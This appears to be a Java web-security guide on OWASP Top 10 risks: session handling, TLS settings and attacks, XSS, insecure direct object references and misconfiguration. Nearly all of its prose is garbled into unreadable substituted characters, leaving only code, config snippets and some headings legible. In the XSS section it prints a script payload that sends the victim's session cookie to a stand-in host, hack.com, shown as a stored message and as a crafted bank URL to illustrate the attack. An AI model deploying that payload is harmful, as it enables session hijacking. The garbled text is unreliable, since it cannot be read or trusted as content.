&A OC@ K<NNRJM? DN @I>MTKO@? =T < OCDM?-K<MOT >JHKJI@IO =@AJM@ NOJM<B@ (@.B <GBJMDOCH (KP=GD>-KMDQ<O@ F@T K<DM) DINO@<? JA NC<MDIB < N@>M@O F@T. 1C@ OCDM?-K<MOT >JHKJI@IO
@I>MTKON OC@ K<NNRJM? PNDIB TJPM KP=GD> F@T <I? N@I? DO OJ TJP AJM NOJM<B@. AI? TJP F@@K TJPM KMDQ<O@ F@T N<A@
DI TJPM F@TNOJM@ AJM ?@>MTKODJI.
0@NNDJI KMJO@>ODJI
0@NNDJI &!
&A TJPM <KKGD><ODJI DN 0@MQG@O 3.0 >JHKGD<IO, TJP >JIADBPM@ DO =T <??DIB OC@ AJGGJRDIB DI TJPM web.xml :
<session-config>
<tracking-mode>COOKIE</tracking-mode>
<cookie-config>
<secure>true</secure>
</cookie-config>
</session-config>
,OC@MRDN@, TJP RDGG I@@? OJ >JIADBPM@ TJPM N@MQ@M. #JM @S<HKG@, DA TJP PN@ AK<>C@ 1JH><O 6, TJP >
</Context>
AI? OJ KMJO@>O OC@ N@NNDJI >JJFD@, EPNO <?? N@>PM@=\OMP@\ OJ OC@ <KKMJKMD<O@ >JII@>OJM DI server.xml :
<Connector port="..." protocol="..." secure="true"/>
0@NNDJI ADS<ODJI
,=QDJPNGT, OC@ N@NNDJI &! HPNO =@ >C<IB@? <AO@M @<>C GJBDI JM GJBJPO.
4C@I <IJITHJPN, OC@ N@NNDJI &! ><PN@ IJOCDIB N@INDODQ@ DN <>>@NND=G@. BPO JI>@
<POC@IOD><O@?, DA TJP F@@K OC@ N<H@ N@NNDJI &! <AO@M < NP>>@NNAPG <POC@IOD><ODJI, @Q@I DA TJP KMJO@>O DO, DO RJPG?
=@ <GM@<?T FIJRI. AI <OO<>F@M >JPG? PN@ OCDN N@NNDJI &! <I? B<DI <>>@NN OJ TJPM K@MNJI<G <>>JPIO.
#JM OC@ N<H@ M@<NJI, <AO@M GJBJPO, OC@ KM@QDJPN N@NNDJI HPNO =@ DIQ<GD?<O@? OCPN OC@ N@NNDJI &! RDGG =@ >C<IB@?.
0@NNDJI ODH@JPO
"<>C <>ODQ@ N@NNDJI DN < KJO@IOD<G JK@I ?JJM JI TJPM <KKGD><ODJI AJM F@M. &A TJP F@@K OC@ N@NNDJIN <GDQ@
AJM@Q@M, TJP BDQ@ HJM@ ODH@ OJ OC@ <OO<>F@MN OJ NO@<G <>ODQ@ N@NNDJI D?@IODAD@MN <I? DHK@MNJI<O@ HJM@ QD>ODHN.
1C<O^N RCT PN@M N@NNDJIN HPNO @SKDM@ <AO@M < A@R HDIPO@N JA DI<>ODQDOT. 1C@ <>>@KO<=G@ ODH@JPO ><ODJIN PK OJ 30 HDIPO@N AJM NDHKG@ KP=GD> <KKGD><ODJI.
,I AK<>C@ 1JH><O 6, OC@ ?@A<PGO N@NNDJI ODH@JPO DN ?@ADI@? DI $TOMCAT_HOME/conf/web.xml <O 30 HI. &A TJP
R<IO < ?DAA@M@IO Q<GP@ AJM < K<MOD>PG<M ?@KGJT@? <KKGD><ODJI, EPNO ?@ADI@ OC@ ?@NDM@? Q<GP@ DI DON web.xml .
"I>MTKO@? OM<INKJMO
AGG OC@ KMJO@>ODJIN ?@N>MD=@? DI OC@ KM@QDJPN N@>ODJIN <M@ PN@G@NN DA F@M >@KO OC@ K<NNRJM?
KMJQD?@? =T OC@ PN@M <O GJBDI ODH@. 1J KM@Q@IO OC<O, DO DN CDBCGT M@>JHH@I?@? OJ N@I? OC@ >M@?@IOD<GN JQ@M < N@>PM@
00) >JII@>ODJI.
B@ ><M@APG OCJPBC. 3PGI@M<=DGDOD@N R@M@ AJPI? DI 00) DI OC@ K<NO <I? IJ ?JP=O I@R R@<FI@NN@N RDGG =@ AJPI? DI
OC@ APOPM@. 1C@ HJNO DHKJMO<IO HDODB<ODJI <B<DINO 00) QPGI@M<=DGDOD@N DN OJ C<Q@ TJPM 00) NO<>F (PNP<GGT '00" JM
,K@I00)) PK-OJ-?<O@ RDOC OC@ G<O@NO N@>PMDOT K<O>C@N.
6JP NCJPG? <GNJ >CJJN@ ><M@APGGT OC@ 00) Q@MNDJIN TJP RDGG NPKKJMO <I? OC@ >DKC@M NPDO@N TJP RDGG <>>@KO ?PMDIB
C<I?NC<F@.
00) Q@MNDJIN
& M@>JHH@I? <O G@<NO 1)0 1.0 (00) 3.1) M@G@<N@? DI 1999. ,G?@M Q@MNDJIN C<Q@ FIJRI DHKJMO<IO QPGI@M<=DGDOD@N.
1)0 1.1 (00) 3.2 DI 2006) <I? 1)0 1.2 (00) 3.3 DI 2008) <M@ KM@A@M<=G@ =PO NJH@ N@MQ@M @IQDMJIH@ION <I?
>GD@ION RJIÔ NPKKJMO OC@H. 1)0 1.1+ DN NPKKJMO@? =T '00" NO<MODIB AMJH '/" 1.7) <I? NJH@ JG? =MJRN@MN ?J IJO
NPKKJMO OC@N@ Q@MNDJIN.
DKC@M NPDO@N
A >DKC@M NPDO@ DN < >JH=DI<ODJI JA < F@T @S>C<IB@ <GBJMDOCH, < >DKC@M <GBJMDOCH (RDOC F@T NDU@) <I? < H@NN<B@
<POC@IOD><ODJI >J?@ (*A) <GBJMDOCH OC<O RDGG =@ PN@? OJ I@BJOD<O@ CJR OC@ @S>C<IB@N =@OR@@I OC@ >GD@IO <I? OC@
N@MQ@M RDGG =@ KMJO@>O@?.
!PMDIB C<I?NC<F@, OC@ >GD@IO N@I?N OC@ GDNO JA >DKC@M NPDO@N C@ NPKKJMON OC@I OC@ N@MQ@M >CJJN@N OC@ JI@ C@
KM@A@MN <HJIBNO DON JRI <>>@KO<=G@ >DKC@M NPDO@N. ,A >JPMN@, DA IJI@ JA OC@ >DKC@M NPDO@N <>>@KO@? =T OC@ N@MQ@M
H<O>C OC@ >DKC@M NPDO@N KMJKJN@? =T OC@ >GD@IO, OC@ C<I?NC<F@ RDGG A<DG <I? OC@ N@MQ@M RDGG M@APN@ OC@ >JII@>ODJI.
BPO NJH@ >DKC@M NPDO@N C<Q@ QPGI@M<=DGDOD@N <I? DO DN @<NT AJM F@M OJ KMJKJN@ JIGT R@<F >DKC@M NPDO@N.
,A >JPMN@, TJP NCJPG? I@Q@M <>>@KO OC@H. 2NP<GGT, TJPM 00) NO<>F RDGG KMJKJN@ < ?@A<PGO GDNO OC<O ?J IJO C<Q@
OC@ R@<F@NO >DKC@M NPDO@N =PO & ?JIÔ M@>JHH@I? OJ M@GT JI OC<O GDNO. "S<>OGT GDF@ OC@ RCDO@-GDNO DIKPO Q<GD?<ODJI
?@N>MD=@? DI OC@ KM@QDJPN <MOD>G@ <=JPO &IE@>ODJI, DO DN CDBCGT M@>JHH@I?@? OJ BDQ@ @SKGD>DOGT OC@ GDNO JA <>>@KO<=G@
>DKC@M NPDO@N. +J NPMKMDN@ DA TJP R<IO OJ >C<IB@ TJPM 00) NO<>F.
(IJRI QPGI@M<=DGDOD@N
1CM@@ DHKJMO<IO QPGI@M<=DGDOD@N R@M@ ?DN>JQ@M@? M@>@IOGT JI 1)0. 1C@T >MTKO OC@ N@NNDJI &! DI
OC@ C@<?@M.
&I 2011, B"A01 (COOK://QIC<>F@M.=GJBNKJO.>JH/2011/09/=@<NO.COHG) (BMJRN@M "SKGJDO AB<DINO 00) <I? 1)0) AJPI?
=T ORJ N@>PMDOT M@N@<M>C@MN, 'PGD<IJ /DUUJ <I? 1C<D !PJIB, @SKGJDON O@? DA TJP PN@ =GJ>F >DKC@MN GDF@ A"0 JM 3-!"0.
V )JIB-O@MH HDODB<ODJI: NPKKJMO JIGT 1)0 1.1 <I? 1)0 1.2 =PO HJNO JA OC@ =MJRN@MN ?J IJO NPKKJMO OC@N@N
Q@MNDJIN <I? DA OC@T <M@ NPKKJMO@?, OC@T <M@ PNP<GGT ?DN<=G@? =T ?@A<PGO.
V 0CJMO-O@MH HDODB<ODJI: RDOC 1)0 1.0 JM JG?@M, JIGT <>>@KO >DKC@M NPDO@N RDOC /4 >DKC@M <GBJMDOCH.
AGOCJPBC < M@>@IO QPGI@M<=DGDOT C<N =@@I AJPI? JI /4, DO DN NODGG OC@ =@NO HDODB<ODJI RDOC 1)0 1.0 JM JG?@M.
B@ <R<M@ OC<O HJNO JA OC@ N@MQ@MN RDGG N@G@>O OC@ ADMNO >DKC@M NPDO@ OC@T NPKKJMO DI OC@ JM?@M@? GDNO KMJQD?@?
=T OC@ >GD@IO. 0J ?JIÔ <>>@KO <IT QPGI@M<=G@ >DKC@M NPDO@N.
&I 2012, OC@ N<H@ ORJ N@>PMDOT M@N@<M>C@MN M@Q@<G@? /&*" (COOKN://?J>N.BJJBG@.>JH/</DKKJI.AM/KM@N@IO<ODJI/?/
11@BH$D%=6>%/9B)5I!T7CP;-G<2$DU@P,A<)22%,2/@?DO#NGD?@=D?.B1?134?AA;1;222) (JHKM@NNDJI /<ODJ
&IAJ-G@<F *<?@ "<NT) OC<O @SKGJDON < QPGI@M<=DGDOT DI 1)0 RC@I ?<O< >JHKM@NNDJI DN <>ODQ<O@?. 1C@ HDODB<ODJI DN OJ
IJO PN@ ?<O< >JHKM@NNDJI <GJIB RDOC 1)0. &A OC@ >GD@IO (OC@ =MJRN@M) KMJKJN@N >JHKM@NNDJI <GBJMDOCHN, OC@ N@MQ@M
HPNO M@APN@ <GG JA OC@H.
)<NO =PO IJO G@<NO, DI 2013, OCM@@ JOC@M N@>PMDOT M@N@<M>C@MN, AIB@GJ -M<?J, +@<G %<MMDN <I? 6J@G $GP>F, DHKMJQ@
/&*" RDOC B/"A% (COOKN://H@?D<.=G<>FC<O.>JH/PN-13/20-13--M<?J-00)-$JI@-DI-30-N@>JI?N-A-B/"A%-
=@TJI?-/&*"-0GD?@N.K?A) (BMJRN@M /@>JII<DNN@ <I? "SADGOM<ODJI QD< A?<KODQ@ JHKM@NNDJI JA %TK@MO@SO).
1CDN ODH@, OC@T @SKGJDO < QPGI@M<=DGDOT DI ?<O< >JHKM@NNDJI <O %11- KMJOJ>JG G@Q@G NJ B/"A% RJMFN @Q@I DA 1)0
?<O< >JHKM@NNDJI DN ?DN<=G@?. 1C@ =@NO HDODB<ODJI DN OJ C<Q@ D@IO 0/# KMJO@>ODJI (?TI<HD> 0/# OJF@I
K@M M@LP@NO). 6JP >JPG? <GNJ ?DN<=G@ %11- >JHKM@NNDJI =PO OCDN RDGG C<Q@ < =DB DHK<>O JI OC@ K@MAJMH@N.
1DK : 1J FIJR DA TJPM N@MQ@M DN QPGI@M<=G@ OJ B"A01 <I? /&*", TJP >@ <I? <?? OC@ B/"A% ?@O@>ODJI =T TJPMN@GA. 1C@ OJJG DN PI?@M *&1-GDF@ GD>@IN@.
,OC@M <OO<>FN ><I, AJM @S<HKG@, AJM>@ < 00)/1)0 M@I@BJOD<ODJI JM ?JRIBM<?@ OC@ KMJOJ>JG Q@MNDJI.
AGOCJPBC OC@ MDNF DN M@<G, OJ =@ @SKGJDO<=G@, HJNO JA OC@ 1)0 QPGI@M<=DGDOD@N M@LPDM@ OC@ <OO<>F@M <I? OC@ QD>ODH
OJ =@ JI OC@ N<H@ I@ORJMF (KP=GD> 4DAD, )A+Y) JM OC@ <OO<>F@M OJ C<Q@ <>>@NN OJ OC@ QD>ODH^N I@ORJMF (&0- JM
BJQ@MIH@IO @HKGJT@@N).
!@N>MDKODJI
MJNN-0DO@ 0>MDKODIB DN < NK@>DAD> >JIN@LP@I>@ JA ODJI <OO<>F. 1C@ BJ<G DN OJ H<F@ < R@= =MJRN@M @S@>PO@
<M=DOM<MT N>MDKODIB >J?@ ('<Q<N>MDKO, A>ODJI0>MDKO, A>ODQ@5Y) PNP<GGT OJ NO@<G K@MNJI<G DIAJMH<ODJI.
"S<HKG@N
-@MNDNO@IO 500 <OO<>F
1C@ <OO<>F@M^N =<IF R@=NDO@ KMJKJN@N < H@NN<BDIB N@MQD>@ OJ >JHHPID><O@ RDOC OC@ >G@MF.
1C@ <OO<>F@M KJNON OC@ AJGGJRDIB H@NN<B@:
Happy New Year!
<script>x=new Image(); x.src=http://hack.com/ilovecookies.jsp?yummy=+document.cookie</script>
,I>@ >JII@>O@? JI OC@ =<IF^N R@=NDO@ RDOC DON NK@>D<G <>>JPIO, OC@ =<IF >G@MF >JINPGON DON I@R H@NN<B@N. 4C@I
C@ JK@IN OC@ NPNKD>DJPN H@NN<B@, C@ RDGG N@@ OC@ [%<KKT +@R 6@<M!\ BM@@ODIBN. 1C@ N@>JI? GDI@ JA OC@ H@NN<B@
RDGG IJO =@ NCJRI =PO DIO@MKM@O@? =T CDN =MJRN@M RCD>C RDGG NDG@IOGT N@I? CDN N@NNDJI &! OJ hack.com. 1C@I OC@
<OO<>F@M RDGG =@ <=G@ OJ CDE<>F OC@ >G@MF^N N@NNDJI JI OC@ =<IF^N R@=NDO@ OJ C<Q@ <>>@NN OJ N@INDODQ@ DIAJMH<ODJI JI
JOC@M >GD@IONY
+JI-K@MNDNO@IO 500 <OO<>F
1C@ <OO<>F@M N@I?N OJ OC@ >G@MF JINPGO DON <>>JPIO RDOC OC@ AJGGJRDIB ?DM@>O GDIF OJ OC@
R@=NDO@:
https://www.mybank.com/details?iban=<script>x=new Image(); x.src=http://hack.com/
ilovecookies.jsp?yummy=+document.cookie</script>
,I>@ <POC@IOD><O@? RDOC DON JRI <>>JPIO, OC@ >G@MF OMD@N OJ ?DNKG<T OC@ <>>JPIO K<B@ PNDIB OC@ KMJQD?@? GDIF =PO
J=QDJPNGT OC@ =<IF >JPG? IJO ADI? OC@ M@LP@NO@? &BA+ <I? ?DNKG<TN G@MF:
IBAN not found: <script>x=new Image(); x.src=http://hack.com/
ilovecookies.jsp?yummy=+document.cookie</script>
,A >JPMN@, OC@ >G@MF >MDKO NIDKK@O DN
DIO@MKM@O@? =T OC@ >G@MF^N =MJRN@M <I? NDG@IOGT N@I? OC@ >G@MF^N N@NNDJI &! OJ hack.com.
*DODB<ODJIN
-MJO@>ODJI <B<DINO DIE@>ODJI <OO<>F
&A TJPM R@= <KKGD><ODJI DN IJO KMJO@>O@? <B<DINO DIE@>ODJI (COOK://=GJB.DKKJI.AM/2013/10/11/JR<NK-OJK-10-<1/)
<OO<>FN, DO DN ?@ADIDO@GT QPGI@M<=G@ OJ 500 <OO<>FN. 4C@I KJNND=G@, Q<GD?<O@ PIOMPNO@? DIKPO =@AJM@ PN<B@ <I?
NOJM<B@.
,POKPO @I>J?DIB
0JH@ODH@N, DO DN ?DAAD>PGO OJ C<Q@ C<M<>O@MN RC@I OC@ DIKPO DN < AM@@ O@SO. &I
OC@N@N ><N@N, DO DN DHKJMO<IO OJ ><IJID><GDU@ OC@ DIKPO ?<O< =@AJM@ NOJM<B@ OC@I @I>J?@ JPOKPO ?<O< NJ OC<O NK@>D<G
>C<M<>O@MN <M@ IJO HDNDIO@MKM@O@? =T OC@ =MJRN@M. &A TJP ?JIÔ ><IJID><GDU@ OC@ DIKPO ?<O< =@AJM@ NOJM<B@, @I>J?@?
,4A0- 1JK 10 Z A3 MJNN 0DO@ 0>MDKODIB (500)
DIKPO ?<O< RDGG =@ M@-@I>J?@?.
".B. < <I? > HPNO =@ >JIQ@MO@? DIOJ < <I? > DI %1*) K<B@N JM OC@ NOMDIB =@OR@@I OC@N@ 2 >C<M<>O@MN
>JPG? =@ DIO@MKM@O@? =T OC@ =MJRN@M <N J?DIB, <script> =@>JH@N
<script> <I? RJIÔ =@ DIO@MKM@O@? <N < N>MDKO ODJPN E<Q<N>MDKO >J?@ RJIÔ =@ @S@>PO@?.
,A >JPMN@, PIOMPNO@? >J?@ >PMDOT;A-&)]N "I>J?@M >J?@ >C<M<>O@MN ?@K@I?DIB JI RC@M@
TJP I@@? OJ DIN@MO PIOMPNO@? >J?@. B@GJR <M@ NJH@ @S<HKG@N:
Encoder encoder = ESAPI.encoder();
String rawOutput = "<script>alert(\"hello\");</script>";
System.out.println("Encoded for HTML : "+encoder.encodeForHTML(rawOutput));
System.out.println("Encoded for CSS : "+encoder.encodeForCSS(rawOutput));
System.out.println("Encoded for Javascript : "+encoder.encodeForJavaScript(rawOutput));
System.out.println("Encoded for URL : "+encoder.encodeForURL(rawOutput));
Encoded for HTML :
<script>alert("hello");</script>
Encoded for CSS : \3c script\3e alert\28 \22 hello\22 \29 \3b \3c \2f script\3e
Encoded for Javascript : \x3Cscript\x3Ealert\x28\x22hello\x22\x29\x3B\x3C\x2Fscript\x3E
Encoded for URL : %3Cscript%3Ealert%28%22hello%22%29%3B%3C%2Fscript%3E
,OC@M JK@I-NJPM>@ OCDM?-K<MOD@N @SDNO OJ @I>J?@ O@SO =@AJM@ JPOKPO. %<Q@ < GJJF JI AK<>C@ JHHJIN-)<IB3
A-& (COOK://>JHHJIN.<K<>C@.JMB/KMJK@M/>JHHJIN-G<IB/E<Q<?J>N/<KD-3.1/JMB/<K<>C@/>JHHJIN/G<IB3/
0OMDIB"N><K@2ODGN.COHG). &O DN G@NN NOMD>O JI @I>J?DIB =PO DO DN <>>@KO<=G@ AJM < NDHKG@ R@= <KKGD><ODJI.
System.out.println("Encoded for HTML : "+StringEscapeUtils.escapeHtml4(rawOutput));
JINJG@ JPOKPO:
Encoded for HTML : <script>alert("hello");</script>
%11-,IGT >JJFD@ AGPNN@? DI OC@ KM@QDJPN <MOD>G@, DA F@M NO@<GN OC@ N@NNDJI &! JA <O@? JI < R@=NDO@, C@ >ODH JI OC<O
R@=NDO@.
AGOCJPBC JIGT OC@ R@= =MJRN@M I@@?N OJ FIJR OC@ N@NNDJI &!, <ITJI@ (DI>GP?DIB < N>MDKO) >JPG? M@<? OC@ Q<GP@.
1C<O^N RCT *D>MJNJAO &"6 ?@Q@GJK@MN ?@>D?@? OJ DHKG@H@IO OC@ %11-,IGT AG<B. 4C@I OCDN AGF <=JQ@ RJIÔ =@ <=G@ OJ NO@<G OC@ N@NNDJI &!.
&A TJPM <KKGD><ODJI DN 0@MQG@O 3.0 >JHKGD<IO, TJP >JIADBPM@ DO =T <??DIB OC@ AJGGJRDIB DI TJPM web.xml :
<session-config>
<cookie-config>
<http-only>true</http-only>
</cookie-config>
</session-config>
,OC@MRDN@, TJP RDGG I@@? OJ >JIADBPM@ TJPM N@MQ@M. #JM @S<HKG@, DA TJP PN@ AK<>C@ 1JH><O 6, TJP >JJFD@N =T <??DIB OC@ <OOMD=PO@ useHttpOnly="true" DI TJPM context.xml :
<Context ... useHttpOnly="true">
</Context>
1J N@@ <GG <MOD>G@N M@G<O@? OJ ,4A0- 1JK 10, AJGGJR OC@ OMDKODJI
1C@ <KKGD><ODJI @SKJN@N < ?DM@>O M@A@M@I>@ (API>ODJI<G D?@IODAD@M, ?<O<=<N@ F@T, ADG@ K<OCY) OJ < M@NJPM>@. 1C<IFN
OJ OC<O ?DM@>O M@A@M@I>@, F@M >O M@A@M@I>@N <I? <>>@NN OJ JOC@M M@NJPM>@N.
2NP<GGT, TJP RDGG ADI? ?DM@>O M@A@M@I>@N DI GDIFN <I? N@G@>ODJI GDNON (?MJK-?JRI GDNO, M<?DJ =POOJIN <I? >C@>F=JS@N)
=PDGO ?TI<HD><GGT RDOC J=E@>ON M@OMD@Q@? AMJH ?<O<=<N@.
"S<HKG@N
)@O^N O<F@ <B<DI OC@ N<H@ @S<HKG@ RDOC HT =<IF^N R@=NDO@.
& >>@NN OJ HT <>>JPIO K<B@ NDHKGT =T KMJQD?DIB HT &BA+ DI OC@ 2/):
http://www.mybank.com/details?iban=FR2711111222333444555666777
AI <OO<>F@M >JPG? C<Q@ <>>@NN OJ <IT JOC@M <>>JPIO =T NDHKGT KMJQD?DIB < Q<GD? &BA+!
*DODB<ODJIN
A>>@NN >JIOMJG
&O H<T =@ J=QDJPN AJM HJNO JA TJP =PO DO^N DHKJMO<IO: =@AJM@ BDQDIB <>>@NN OJ < KMJO@>O@? M@NJPM>@, Q@MDAT OC<O OC@
M@LP@NOJM DN <POCJMDU@? OJ <>>@NN OC<O M@NJPM>@.
#JM HT @S<HKG@, TJP HPNO Q@MDAT OC@ <>>JPIO RDOC OC@ M@LP@NO@? &BA+ =@GJIBN OJ OC@ <POC@IOD><O@? PN@M =@AJM@
TJP ?DNKG<T OC@ <>>JPIO ?@O<DGN.
&I?DM@>O J=E@>O M@A@M@I>@
/@KG<>@ OC@ ?DM@>O M@A@M@I>@ RDOC O M@A@M@I>@.
1C@ KMDI>DKG@ DN NDHKG@: JI N@MQ@M-ND?@, AJM @<>C ?DM@>O M@A@M@I>@, B@I@M<O@ <IJOC@M D?@IODAD@M <I? PN@ OCDN D?@IODAD@M
DI TJPM R@= K<B@ DINO@<? JA OC@ ?DM@>O M@A@M@I>@. 1C@ B@I@M<O@? D?@IODAD@M > NPDO@Y AITOCDIB TJP R<IO <N GJIB <N DO DN IJO KJNND=G@ AJM F@M OJ BP@NN < ?DM@>O M@A@M@I>@ AMJH
OC@ @SKJN@? D?@IODAD@M. ,A >JPMN@, JI N@MQ@M-ND?@, TJP RDGG I@@? < H<KKDIB O<=G@ OJ M@OMD@Q@ OC@ ?DM@>O M@A@M@I>@.
4C@I TJP >M@<O@ TJPM QD@R J=E@>ON, M@KG<>@ <GG ?DM@>O M@A@M@I>@N RDOC B@I@M<O@? DI?DM@>O M@A@M@I>@N:
...
Map<String, String> accountIndirectRefs = new HashMap<String, String>();
List<AccountVO> accountVOList = new ArrayList<AccountVO>();
String accountIndirectRef = null;
AccountVO accountVO = null;
for(String account : accountList) {
accountVO = new AccountVO();
accountIndirectRef = generateIndirectReference();
accountIndirectRefs.put(accountIndirectRef, account.getIban());
accountVO.setReference(accountIndirectRef);
accountVOList.add(accountVO);
OWASP Top 10 A4 nsecure Direct Object References
}
session.setAttribute("accountIndirectRefs", accountIndirectRefs);
...
&I OCDN N<HKG@, TJP >O M@A@M@I>@ B@I@M<O@? PNDIB B@I@M<O@&I?DM@>O/@A@M@I>@() H@OCJ? ?J@N IJO
M@GT JI OC@ ?DM@>O M@A@M@I>@. 1CDN H@OCJ? >C<M<>O@MN (A, B, Y)
=PO & M@>JHH@I? < M<I?JH <GKC<IPH@MD> NOMDIB. 1CPN F@M RJIÔ =@ <=G@ OJ BP@NN OC@ KJNND=G@ DI?DM@>O
Q<GP@N. 4@ RDGG O<GF <=JPO 0/# <OO<>FN DI <IJOC@M <MOD>G@.
&I OC@ [*T A>>JPION\ K<B@, OC@ GDIFN OJ OC@ <>>JPIO ?@O<DGN RJIÔ C<Q@ OC@ M@<G &BA+ <ITHJM@ <N < K<M<H@O@M
=PO OC@ DI?DM@>O M@A@M@I>@ DI < I@R ibanRef K<M<H@O@M. 4C@I TJP KMJ>@NN OC@ M@LP@NO, TJP M@OMD@Q@ OC@ ?DM@>O
M@A@M@I>@ AMJH OC@ KMJQD?@? DI?DM@>O M@A@M@I>@:
...
String ibanRef = request.getParameter("ibanRef");
Map<String, String> accountIndirectRefs = session.getAttribute("accountIndirectRefs");
String iban = accountIndirectRefs.get(ibanRef);
...
&A OC@ DI?DM@>O M@A@M@I>@ DN IJO AJPI? DI N@NNDJI, DO DN >@MO<DIGT F.
&I OCDN @S<HKG@, DO >JPG? =@ <GNJ < >PNOJH@M OC<O C<Q@ N<Q@? OC@ GDIF DI CDN A<QJMDO@N =PO, DI OC@ M@<G RJMG?, TJP
RJPG? IJO C<Q@ < ?DM@>O GDIF OJ OC@ <>>JPIO K<B@, MDBCO?
6JP >O M@A@M@I>@N. "0A-&
KMJQD?@N OC@ A>>@NN/@A@M@I>@*A-<(> (COOK://JR<NK-@N<KD-E<Q<.BJJBG@>J?@.>JH/NQI/OMPIF;?J>/G<O@NO/JMB/
JR<NK/@N<KD/A>>@NN/@A@M@I>@*<K.COHG) DIO@MA<>@ <I? KMJKJN@N JPO-JA-OC@-=JS ORJ DHKG@H@IO<ODJIN OJ B@I@M<O@
@DOC@M O M@A@M@I>@. ,A >JPMN@, TJP >M@<O@ TJPM JRI DHKG@H@IO<ODJI OJ
B@I@M<O@ RC<O@Q@M TJP R<IOY
!@N>MDKODJI
+JR<?<TN, =@ND?@N OC@ JK@M<ODIB NTNO@H <I? OC@ '/", HJNO JA OC@ '<Q< <KKGD><ODJIN <M@ =<N@? JI OCDM?-K<MOT
AM<H@RJMFN, JK@I-NJPM>@ JM KMJKMD@O<MT. *JM@JQ@M, < R@= <KKGD><ODJI DN ?@KGJT@? JI <ODJI N@MQ@M (JM <
N@MQG@O >JIO<DI@M).
AGG OC@N@ >JHKJI@ION M@KM@N@IO < GJO JA KJO@IOD<G MDNFN F@M >C@>FDIB OC@ 0@MQ@M %11- C@<?@M N@IO =T OC@ =<IF^N R@=NDO@, OC@ <OO<>F@M FIJRN RCD>C R@= N@MQ@M TJP <M@
PNDIB <I? ADI? QPGI@M<=DGDOD@N.
0O<>F OM<>@
AI <OO<>F@M ADI?N < R<T OJ B@I@M<O@ <PBCO @S>@KODJI JI TJPM =<IF^N R@=NDO@. 1C@ NO<>F OM<>@ DN ?DNKG<T@? DI
< R@= K<B@. 4DOC OC<O M@Q@<G@? DIAJMH<ODJI, OC@ <OO<>F@M FIJRN RCD>C KJMO<G NJGPODJI DN PN@?. AI?, <N OC@ ?@A<PGO
<?HDIDNOM<ODJI <>>JPIO R<N IJO ?@G@O@? <I? OC@ K<NNRJM? R<N IJO HJ?DAD@?, OC@ <OO<>F@M >JHKJI@ION TJP C<Q@ OJ KMJK@MGT >JIADBPM@:
V ,K@M<ODIB 0TNO@H ()DIPS, 0JG<MDN, A&5, 4DI?JRNY)
V '<Q< /PIODH@ "IQDMJIH@IO (0PI, &B*Y)
V AKKGD><ODJI 0@MQ@M, 0@MQG@O JIO<DI@M (1JH><O, '@OOT, $G<NNADNC, EBJNNY)
V 4@= 0@MQ@M (%11-!, +BDISY)
V /!B*0 (,M<>G@, 0.) 0@MQ@M, *T0.)Y)
V 1CDM?-K<MOT AM<H@RJMFN
_ 0KMDIB
_ 40 NO<>F (5#, 0KMDIB 40, ASDN2Y)
_ ,/* AM<H@RJMF (%D=@MI<O@, 1JK)DIFY)
_ '0# DHKG@H@IO<ODJI (-MDH@#<>@N, *T#<>@NY)
_ -JMO<G ()DA@M<T, "SJY)
OWASP Top 10 A5 Security Misconfiguration
(COOK://=GJB.DKKJI.AM/RK->JIO@IO/PKGJ<?N/2013/
11/N@>PMDOT;CJG@N.KIB)
NJPM>@: SF>?.>JH
&INO<GG N@>PMDOT K<O>C@N
&O DN @<ND@M OJ <OO<>F < R@=NDO@ RC@I TJP FIJR DON A>CDGG@N^ C@@G.
0@>PMDOT <?QDNJMD@N <M@ KP=GDNC@? <AO@M OC@ M@G<O@? N@>PMDOT ADS@N <M@ M@G@<N@? =T N@MQ@M KMJQD?@M (@.B. AK<>C@
2.2 (COOK://COOK?.<K<>C@.JMB/N@>PMDOT/QPGI@M<=DGDOD@N;22.COHG), AK<>C@ 2.4 (COOK://COOK?.<K<>C@.JMB/N@>PMDOT/
QPGI@M<=DGDOD@N;24.COHG), <GG Q@MNDJIN JA +BDIS (COOK://IBDIS.JMB/@I/N@>PMDOT;<?QDNJMD@N.COHG)). &A F@M FIJRN
TJP <M@ PNDIB JHKJI@IO <I? OC<O Q@MNDJI C<N < >MDOD><G N@>PMDOT DNNP@, C@ >@, N@>PMDOT ADS@N HPNO =@ O@NO@? <I? ?@KGJT@? <N NJJI <N KJNND=G@ JI KMJ?P>ODJI. ,A >JPMN@, DA TJP C<Q@ <
>JIODIPJPN DIO@BM<ODJI @IQDMJIH@IO RDOC <POJH<O@? PIDO O@NON <I? DIO@BM<ODJI O@NON, DO RDGG =@ @<ND@M <I? A<NO@M OJ
O@NO <GG TJPM <KKGD><ODJI =PO OCDN DN JPO JA OC@ N>JK@ JA OCDN <MOD>G@. !@K@I?DIB JI OC@ N@Q@MDOT JA OC@ N@>PMDOT DNNP@,
OC@ <>>@KO<=G@ ?@G<T AJM ?@KGJTDIB OC@ N@>PMDOT K<O>C@N >MDOD><G DNNP@ PK OJ 3 HJIOCN
AJM < GJR N@Q@MDOT DNNP@.
1DK: 0P=N>MD=@ OJ OC@ H<DGDIB-GDNO JA @<>C >JHKJI@IO (,0, N@MQ@MN, OCDM?-K<MOT AM<H@RJMFNY) PN@? OJ MPI
TJPM <KKGD><ODJI OJ =@ DIAJMH@? <N NJJI <N < I@R Q@MNDJI DN <Q<DG<=G@. ".B. NP=N>MD=@ OJ AK<>C@ H<DGDIB-GDNON
(COOK://RRR.<K<>C@.JMB/AJPI?<ODJI/H<DGDIBGDNON.COHG) OJ AJGGJR <GG AK<>C@ KMJE@>ON JM AK<>C@ 5# H<DGDIB-GDNON
(COOK://>SA.<K<>C@.JMB/H<DGDIB-GDNON.COHG) OJ AJGGJR JIGT I@RN <=JPO 5#.
,=APN><O@ N@INDODQ@ DIAJMH<ODJI
)JBN
+@Q@M NOJM@ N@INDODQ@ DIAJMH<ODJI DI GJBN. &A TJP KMJO@>O OC@N@ N@INDODQ@ ?<O< (& CJK@ TJP ?J), OC@ R<T TJP KMJO@>O
OC@H DN <GNJ < N@INDODQ@ DIAJMH<ODJI. ".B. DA TJP PN@ -B(!#2 OJ KMJO@>O TJPM K<NNRJM?N, ?JIÔ M@Q@<G I@DOC@M OC@
<GBJMDOCH IJM OC@ IPH=@M JA DO@M<ODJIN TJP <KKGT.
,A >JPMN@, NJH@ GJBN <M@ B@I@M<O@? =T < OCDM?-K<MOT AM<H@RJMF. &I OC<O ><N@, >JIADBPM@ KMJK@MGT TJPM GJBBDIB
AM<H@RJMF RDOC OC@ <KKMJKMD<O@ G@Q@G OJ IJO NOJM@ N@INDODQ@ DIAJMH<ODJI. ".B. DA TJPM ,/* AM<H@RJMF GJBN OC@ APGG
